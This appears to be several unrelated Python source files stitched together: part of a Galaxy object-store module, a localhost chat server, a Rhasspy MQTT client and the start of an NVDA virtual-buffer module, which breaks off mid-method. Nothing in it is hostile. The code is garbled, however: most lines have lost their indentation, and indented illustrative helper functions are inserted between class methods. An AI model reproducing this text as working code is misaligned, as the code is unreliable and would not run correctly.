# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
path = self._construct_path(obj, **kwargs)
if not os.path.exists(path):
raise ObjectNotFound
return path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop('preserve_symlinks', False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self._create(obj, **kwargs)
if file_name and self._exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self._get_filename(obj, **kwargs))
else:
path = self._get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except OSError as ex:
log.critical('Error copying {} to {}: {}'.format(file_name, self.__get_filename(obj, **kwargs), ex))
raise ex
def _get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def _get_store_usage_percent(self, **kwargs):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
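# A small, hypothetical illustration (not used by the store itself) of the two
# layouts _construct_path can produce for a dataset: the old-style flat path and
# the hashed path. The bucketing below is a stand-in for directory_hash_id,
# which this module imports elsewhere; the real helper may group ids differently.
def _example_disk_paths(file_path, obj_id):
    old_style = os.path.join(file_path, "dataset_%s.dat" % obj_id)
    bucket = "%03d" % (int(obj_id) // 1000)  # e.g. id 1 -> "000"
    hashed = os.path.join(file_path, bucket, "dataset_%s.dat" % obj_id)
    return old_style, hashed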
class NestedObjectStore(BaseObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super().__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super().shutdown()
def _exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method('_exists', obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method('file_ready', obj, False, False, **kwargs)
def _create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def _empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method('_empty', obj, True, False, **kwargs)
def _size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method('_size', obj, 0, False, **kwargs)
def _delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method('_delete', obj, False, False, **kwargs)
def _get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method('_get_data', obj, ObjectNotFound, True, **kwargs)
def _get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method('_get_filename', obj, ObjectNotFound, True, **kwargs)
def _update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get('create', False):
self._create(obj, **kwargs)
kwargs['create'] = False
return self._call_method('_update_from_file', obj, ObjectNotFound, True, **kwargs)
def _get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method('_get_object_url', obj, None, False, **kwargs)
def _get_store_by(self, obj):
return self._call_method('_get_store_by', obj, None, False)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return f'{obj.__class__.__name__}({self.store_by}={obj_id})'
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception,
**kwargs):
"""Check all children object stores for the first one with the dataset."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects, the first store where the object exists is used.
When creating objects, they are created in a store selected randomly, but
with weighting.
"""
store_type = 'distributed'
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_dict: dict
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super().__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
random.seed()
for backend_def in config_dict["backends"]:
backend_id = backend_def["id"]
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
backend = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends[backend_id] = backend
self.max_percent_full[backend_id] = maxpctfull
for _ in range(0, weight):
# The simplest way to do weighting: add each backend id to a
# sequence a number of times equal to its weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backend_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
self.filesystem_monitor_thread.daemon = True
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find('backends')
backends = []
config_dict = {
'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
'backends': backends,
}
for b in [e for e in backends_root if e.tag == 'backend']:
store_id = b.get("id")
store_weight = int(b.get("weight", 1))
store_maxpctfull = float(b.get('maxpctfull', 0))
store_type = b.get("type", "disk")
store_by = b.get('store_by', None)
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["id"] = store_id
backend_config_dict["weight"] = store_weight
backend_config_dict["max_percent_full"] = store_maxpctfull
backend_config_dict["type"] = store_type
if store_by is not None:
backend_config_dict["store_by"] = store_by
backends.append(backend_config_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, \
"distributed object store ('object_store = distributed') " \
"requires a config file, please set one in " \
"'distributed_object_store_config_file'"
log.debug('Loading backends for distributed object store from %s', distributed_config)
config_xml = parse_xml(distributed_config).getroot()
legacy = True
else:
log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self):
as_dict = super().to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super().shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
self.sleeper.sleep(120) # Test free space every 2 minutes
def _create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self._exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid('objectstore.create, could not generate '
'obj.object_store_id: %s, kwargs: %s'
% (str(obj), str(kwargs)))
log.debug("Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
else:
log.debug("Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
% (obj.object_store_id, obj.__class__.__name__, obj.id))
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning('%s object with ID %s found in backend object store with ID %s'
% (obj.__class__.__name__, obj.id, id))
obj.object_store_id = id
return id
return None
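# A minimal sketch (illustrative names only) of the weighting scheme used at
# creation time above: each backend id appears `weight` times in a list, so
# random.choice over that list picks backends in proportion to their weights.
def _example_weighted_ids(backend_weights):
    weighted_ids = []
    for backend_id, weight in backend_weights.items():
        weighted_ids.extend([backend_id] * weight)
    return weighted_ids
# e.g. random.choice(_example_weighted_ids({"files1": 3, "files2": 1})) returns
# "files1" roughly three times as often as "files2".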
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects, the first store where the object exists is used.
When creating objects, only the first store is used.
"""
store_type = 'hierarchical'
def __init__(self, config, config_dict, fsmon=False):
"""The default contructor. Extends `NestedObjectStore`."""
super().__init__(config, config_dict)
backends = OrderedDict()
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for b in sorted(config_xml.find('backends'), key=lambda b: int(b.get('order'))):
store_type = b.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super().to_dict()
backends = []
for backend in self.backends.values():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def _exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def _create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class = None
objectstore_constructor_kwds = {}
if store == 'disk':
objectstore_class = DiskObjectStore
elif store == 's3':
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == 'cloud':
from .cloud import Cloud
objectstore_class = Cloud
elif store == 'swift':
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == 'distributed':
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'hierarchical':
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'irods':
from .irods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == 'azure_blob':
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == 'pithos':
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = 'xml'
if config is None and config_dict is not None and 'config' in config_dict:
# Build a config object from to_dict of an ObjectStore.
config = Bunch(**config_dict["config"])
elif config is None:
raise Exception("build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict")
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = parse_xml(config.object_store_config_file).getroot()
store = config_xml.get('type')
else:
with open(config_file) as f:
config_dict = yaml.safe_load(f)
from_object = 'dict'
store = config_dict.get('type')
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get('type')
elif config_dict is not None:
from_object = 'dict'
store = config_dict.get('type')
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if objectstore_class is None:
log.error(f"Unrecognized object store definition: {store}")
raise Exception(f"Unrecognized object store definition: {store}")
if from_object == 'xml':
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get('base_dir', None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == 'DiskObjectStore':
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception("Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?"
% func.__name__)
return wraps
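# A hypothetical sketch of how a plugin might apply local_extra_dirs: when a
# base_dir (job_work/temp) is requested, the decorated method falls back to
# DiskObjectStore's implementation because those extra_dirs live on the local
# filesystem even for remote backends. The class and path below are made up.
class _ExampleRemoteStore(DiskObjectStore):
    @local_extra_dirs
    def _get_filename(self, obj, **kwargs):
        return "remote://example-bucket/dataset_%s.dat" % self._get_object_id(obj)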
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = '%.2fTB' % terabytes
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = '%.2fGB' % gigabytes
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = '%.2fMB' % megabytes
elif bytes >= 1024:
kilobytes = bytes / 1024
size = '%.2fKB' % kilobytes
else:
size = '%.2fb' % bytes
return size
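# Worked examples (illustrative): convert_bytes(1536) -> '1.50KB',
# convert_bytes(1073741824) -> '1.00GB', and convert_bytes(None) -> '0.00b'.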
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
"""
return {
'object_store_check_old_style': config.object_store_check_old_style,
'file_path': config.file_path,
'umask': config.umask,
'jobs_directory': config.jobs_directory,
'new_file_path': config.new_file_path,
'object_store_cache_path': config.object_store_cache_path,
'gid': config.gid,
}
class ObjectStorePopulator:
""" Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, app, user):
self.object_store = app.object_store
self.object_store_id = None
self.user = user
def set_object_store_id(self, data):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
data.dataset.object_store_id = self.object_store_id
try:
self.object_store.create(data.dataset)
except ObjectInvalid:
raise Exception('Unable to create output dataset: object store is full')
self.object_store_id = data.dataset.object_store_id # these will be the same thing after the first output
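# A minimal, hypothetical usage sketch: create one ObjectStorePopulator per job
# so that every output dataset ends up in the same backend. `app`, `user`, and
# `datasets` here are illustrative stand-ins for real Galaxy objects.
def _example_populate_outputs(app, user, datasets):
    populator = ObjectStorePopulator(app, user)
    for data in datasets:
        # The first call picks a backend; later calls reuse the same
        # object_store_id remembered by the populator.
        populator.set_object_store_id(data)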
|
server.py
|
#imports
import socket
import threading
class ChatServer:
clients_list = []
last_received_message = ""
def __init__(self):
self.server_socket = None
self.create_listening_server()
# Listen for incoming connections
def create_listening_server(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create a TCP socket over IPv4
local_ip = '127.0.0.1'
local_port = 10319
# allow the address to be reused so the server can be restarted immediately
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to the local loopback address and port
self.server_socket.bind((local_ip, local_port))
print("Listening for incoming messages..")
self.server_socket.listen(5) # listen for incoming connections, backlog of 5
self.receive_messages_in_a_new_thread()
# Receive messages from a connected client socket
def receive_messages(self, so):
while True:
incoming_buffer = so.recv(256) # receive up to 256 bytes from the client
if not incoming_buffer:
break
self.last_received_message = incoming_buffer.decode('utf-8')
self.broadcast_to_all_clients(so) # send to all clients
so.close()
#broadcast the message to all clients
def broadcast_to_all_clients(self, senders_socket):
for client in self.clients_list:
client_socket, (ip, port) = client
if client_socket is not senders_socket:
client_socket.sendall(self.last_received_message.encode('utf-8'))
def receive_messages_in_a_new_thread(self):
while True:
client = so, (ip, port) = self.server_socket.accept()
self.add_to_clients_list(client)
print('Connected to ', ip, ':', str(port))
t = threading.Thread(target=self.receive_messages, args=(so,))
t.start()
#add a new client
def add_to_clients_list(self, client):
if client not in self.clients_list:
self.clients_list.append(client)
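# A minimal, hypothetical client for manually exercising this server (not part
# of the original module): it connects to 127.0.0.1:10319, sends one message,
# and prints whatever the server broadcasts from other clients.
def example_client(message='hello from example_client'):
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('127.0.0.1', 10319))
    client_socket.sendall(message.encode('utf-8'))
    def reader():
        while True:
            data = client_socket.recv(256)
            if not data:
                break
            print(data.decode('utf-8'))
    threading.Thread(target=reader, daemon=True).start()
    return client_socket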
if __name__ == "__main__":
ChatServer()
|
mqtt.py
|
"""Support for MQTT input/output."""
import json
import socket
import threading
import time
from collections import defaultdict
from queue import Queue
from typing import Any, Dict, List
import pydash
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
MqttConnected,
MqttDisconnected,
MqttMessage,
MqttPublish,
MqttSubscribe,
)
# -----------------------------------------------------------------------------
# Events
# -----------------------------------------------------------------------------
class MessageReady:
"""Internal event for actor."""
pass
# -----------------------------------------------------------------------------
# Interoperability with Snips.AI Hermes protocol
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesMqtt(RhasspyActor):
"""Communicate with MQTT broker using Hermes protocol."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.client = None
self.connected = False
self.subscriptions: Dict[str, List[RhasspyActor]] = defaultdict(list)
self.publications: Dict[str, List[bytes]] = defaultdict(list)
self.message_queue: Queue = Queue()
self.site_ids: List[str] = []
self.site_id = "default"
self.host = "localhost"
self.port = 1883
self.username = ""
self.password = None
self.reconnect_sec = 5
self.publish_intents = True
self.tls = {"enabled": False}
# -------------------------------------------------------------------------
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
# Load settings
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
if self.site_ids:
self.site_id = self.site_ids[0]
else:
self.site_id = "default"
self.host = self.profile.get("mqtt.host", "localhost")
self.port = int(self.profile.get("mqtt.port", 1883))
self.username = self.profile.get("mqtt.username", "")
self.password = self.profile.get("mqtt.password", None)
self.reconnect_sec = self.profile.get("mqtt.reconnect_sec", 5)
self.publish_intents = self.profile.get("mqtt.publish_intents", True)
self.tls = self.profile.get("mqtt.tls", {"enabled": False})
if self.profile.get("mqtt.enabled", False):
self.transition("connecting")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
self.save_for_later(message, sender)
def to_connecting(self, from_state: str) -> None:
"""Transition to connecting state."""
import paho.mqtt.client as mqtt
self.client = mqtt.Client()
assert self.client is not None
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_disconnect = self.on_disconnect
if pydash.get(self.tls, "enabled", False):
import ssl
allowed_cert_reqs = {
"CERT_REQUIRED": ssl.CERT_REQUIRED,
"CERT_OPTIONAL": ssl.CERT_OPTIONAL,
"CERT_NONE": ssl.CERT_NONE,
}
self.client.tls_set(
ca_certs=pydash.get(self.tls, "ca_certs", None),
cert_reqs=pydash.get(
allowed_cert_reqs,
pydash.get(self.tls, "cert_reqs", "CERT_REQUIRED"),
ssl.CERT_REQUIRED,
),
certfile=pydash.get(self.tls, "certfile", None),
ciphers=pydash.get(self.tls, "ciphers", None),
keyfile=pydash.get(self.tls, "keyfile", None),
tls_version=ssl.PROTOCOL_TLS,
)
if self.username:
self._logger.debug("Logging in as %s", self.username)
self.client.username_pw_set(self.username, self.password)
self._logger.debug("Connecting to MQTT broker %s:%s", self.host, self.port)
def do_connect():
success = False
while not success:
try:
ret = self.client.connect(self.host, self.port)
self.client.loop_start()
while (ret != 0) and (self.reconnect_sec > 0):
self._logger.warning("Connection failed: %s", ret)
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
ret = self.client.connect(self.host, self.port)
success = True
except Exception:
self._logger.exception("connecting")
if self.reconnect_sec > 0:
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
self._logger.debug("Connection successful.")
# Connect in a separate thread
threading.Thread(target=do_connect, daemon=True).start()
def in_connecting(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connecting."""
if isinstance(message, MqttConnected):
self.connected = True
self.transition("connected")
elif isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.save_for_later(message, sender)
def to_connected(self, from_state: str) -> None:
"""Transition to connected state."""
assert self.client is not None
# Subscribe to topics
for topic in self.subscriptions:
self.client.subscribe(topic)
self._logger.debug("Subscribed to %s", topic)
# Publish outstanding messages
for topic, payloads in self.publications.items():
for payload in payloads:
self.client.publish(topic, payload)
self.publications.clear()
def in_connected(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connected state."""
if isinstance(message, MqttDisconnected):
if self.reconnect_sec > 0:
self._logger.debug("Reconnecting in %s second(s)", self.reconnect_sec)
time.sleep(self.reconnect_sec)
self.transition("started")
else:
self.transition("connecting")
elif isinstance(message, MessageReady):
while not self.message_queue.empty():
mqtt_message = self.message_queue.get()
for receiver in self.subscriptions[mqtt_message.topic]:
self.send(receiver, mqtt_message)
elif self.connected:
from rhasspy.intent import IntentRecognized
assert self.client is not None
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
self.client.subscribe(message.topic)
self._logger.debug("Subscribed to %s", message.topic)
elif isinstance(message, MqttPublish):
self.client.publish(message.topic, message.payload)
elif isinstance(message, IntentRecognized):
if self.publish_intents:
self.publish_intent(message.intent)
else:
self.save_for_later(message, sender)
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
if self.client is not None:
self.connected = False
self._logger.debug("Stopping MQTT client")
self.client.loop_stop()
self.client = None
# -------------------------------------------------------------------------
def save_for_later(self, message: Any, sender: RhasspyActor) -> None:
"""Cache message until connected."""
if isinstance(message, MqttSubscribe):
receiver = message.receiver or sender
self.subscriptions[message.topic].append(receiver)
elif isinstance(message, MqttPublish):
self.publications[message.topic].append(message.payload)
# -------------------------------------------------------------------------
def on_connect(self, client, userdata, flags, rc):
"""Callback when connected to broker."""
try:
self._logger.info("Connected to %s:%s", self.host, self.port)
self.send(self.myAddress, MqttConnected())
except Exception:
self._logger.exception("on_connect")
def on_disconnect(self, client, userdata, flags, rc):
"""Callback when disconnected from broker."""
try:
self._logger.warning("Disconnected")
self.connected = False
self.send(self.myAddress, MqttDisconnected())
except Exception:
self._logger.exception("on_disconnect")
def on_message(self, client, userdata, msg):
"""Callback when message received."""
try:
self.message_queue.put(MqttMessage(msg.topic, msg.payload))
self.send(self.myAddress, MessageReady())
except Exception:
self._logger.exception("on_message")
# -------------------------------------------------------------------------
def publish_intent(self, intent: Dict[str, Any]) -> None:
"""Publish intent to MQTT using Hermes protocol."""
intent_name = pydash.get(intent, "intent.name", "")
not_recognized = len(intent_name) == 0
assert self.client is not None
if not_recognized:
# Publish using Hermes protocol
topic = "hermes/nlu/intentNotRecognized"
payload = json.dumps({"sessionId": "", "input": intent.get("text", "")})
else:
# Publish using Rhasspy protocol
topic = f"rhasspy/intent/{intent_name}"
payload = json.dumps(
{ev["entity"]: ev["value"] for ev in intent["entities"]}
)
self.client.publish(topic, payload)
# Publish using Hermes protocol
topic = f"hermes/intent/{intent_name}"
payload = json.dumps(
{
"sessionId": "",
"siteId": self.site_id,
"input": intent.get("text", ""),
"intent": {
"intentName": intent_name,
"confidenceScore": pydash.get(intent, "intent.confidence", 1),
},
"slots": [
{
"slotName": ev["entity"],
"confidence": 1,
"value": {"kind": ev["entity"], "value": ev["value"]},
"rawValue": ev.get("raw_value", ev["value"]),
}
for ev in intent.get("entities", [])
],
"asrTokens": [],
"asrConfidence": 1,
}
).encode()
self.client.publish(topic, payload)
self._logger.debug("Published intent to %s", topic)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems on startup."""
problems: Dict[str, Any] = {}
s = socket.socket()
try:
s.connect((self.host, self.port))
except Exception:
problems[
"Can't connect to server"
] = f"Unable to connect to your MQTT server at {self.host}:{self.port}. Is it running?"
finally:
s.close()
return problems
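# A minimal, illustrative example (not part of Rhasspy) of the intent dict shape
# that publish_intent above consumes; the intent and entity names are made up.
# For a dict like this, payloads are published to "rhasspy/intent/LightOn" and
# "hermes/intent/LightOn".
def _example_intent() -> Dict[str, Any]:
    return {
        "text": "turn on the light",
        "intent": {"name": "LightOn", "confidence": 1.0},
        "entities": [{"entity": "name", "value": "light", "raw_value": "light"}],
    }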
|
__init__.py
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2015 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(unicode):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): ur"\\:",
ord(u";"): ur"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda text: unicode(text).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(unicode(name))
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif values[0] is None:
# There must be no value for this attribute.
optRegexp.append(r";")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches.
optRegexp.append("(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(");")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def label(self):
if self.itemType == "landmark":
attrs = self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])
name = attrs.get("name", "")
if name:
name += " "
return name + aria.landmarkRoles[attrs["landmark"]]
else:
return super(VirtualBufferQuickNavItem,self).label
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
